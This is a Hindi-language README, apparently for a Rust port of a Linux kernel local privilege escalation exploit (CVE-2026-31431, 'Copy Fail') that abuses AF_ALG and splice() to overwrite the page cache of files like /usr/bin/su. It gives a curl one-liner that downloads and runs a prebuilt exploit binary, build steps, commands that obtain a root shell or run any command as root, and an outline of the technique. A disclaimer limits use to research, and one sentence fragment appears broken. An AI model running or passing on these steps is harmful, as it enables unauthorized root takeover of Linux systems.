
कॉपी फेल एक्सप्लॉइट (CVE-2026-31431) लेकिन Rust में।
कॉपी फेल एक्सप्लॉइट (CVE-2026-31431) लेकिन रस्ट में, एक गंभीर कमजोरी जो AF_ALG और splice() को जोड़कर 4-बाइट पेज कैश राइट प्राप्त करती है, जिससे प्रमुख लिनक्स वितरणों पर स्थानीय विशेषाधिकार वृद्धि होती है।
Xint Code के शोध और PoC पर आधारित।
[!CAUTION] यह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। उन सिस्टमों पर इस एक्सप्लॉइट को चलाना जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। इस कोड का उपयोग जिम्मेदारी से करें ताकि समान कमजोरियों को समझा और उनसे बचाव किया जा सके।
libc के माध्यम से सीधे लिनक्स कर्नेल के AF_ALG और splice() सिस्कॉल के साथ इंटरैक्ट करता है।आप पूर्व-संकलित PoC बाइनरी को सीधे डाउनलोड और चला सकते हैं:
curl -L https://github.com/sammwyy/copyfail-rs/releases/download/poc/copyfail-rs_x86-64 -o copyfail-rs && chmod +x copyfail-rs && ./copyfail-rs
/usr/bin/su है)।रिपॉजिटरी को क्लोन करें और बाइनरी बनाएं:
git clone https://github.com/sammwyy/copyfail-rs.git
cd copyfail-rs
cargo build --release
बिना तर्कों के एक्सप्लॉइट चलाएं ताकि डिफ़ॉल्ट रूप से /bin/sh का उपयोग हो:
./target/release/copyfail-rs
या रूट के रूप में चलाने के लिए एक कस्टम कमांड निर्दिष्ट करें:
./target/release/copyfail-rs "whoami > /tmp/pwned"
एक्सप्लॉइट लिनक्स कर्नेल के क्रिप्टो API (AF_ALG) के भीतर authencesn कार्यान्वयन में एक बग का लाभ उठाता है। MSG_MORE के साथ sendmsg और splice() को जोड़कर, मनमानी फ़ाइलों (जैसे /usr/bin/su) के पेज कैश के छोटे हिस्सों को दुर्भावनापूर्ण ELF पेलोड के साथ अधिलेखित करना संभव है।
AF_ALG सॉकेट बनाता है और authencesn(hmac(sha256),cbc(aes)) से बांधता है।AF_ALG कमजोरी का उपयोग करके पेलोड को लक्ष्य फ़ाइल के पेज कैश में पुनरावृत्त रूप से स्प्लाइस करता है।